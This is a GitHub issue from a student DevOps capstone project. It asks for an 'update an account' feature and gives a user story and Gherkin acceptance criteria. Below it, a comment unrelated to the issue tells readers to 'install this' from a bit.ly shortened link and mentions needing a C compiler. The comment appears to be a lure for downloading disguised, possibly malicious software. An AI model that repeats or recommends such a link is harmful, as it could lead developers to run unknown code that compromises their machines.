### ISSUE TITLE
Update an account in the service

### ISSUE THREAD

**Issue by raffaele-russo** [raffaele-russo/devops-capstone-project#11]
**As a** customer 
**I need**  to update a stored account 
**So that** I can modify the related name and address

### Acceptance Criteria     
    gherkin 
    Scenario: Update an existing account
    Given an existing account
    When the customer  updates the account's name and/or address
    Then the system will update the account and confirm the success of the operation

**Comment by 102898Is** [comment]
install this
https://bit.ly/4gx42eQ

you may need to install the c compiler
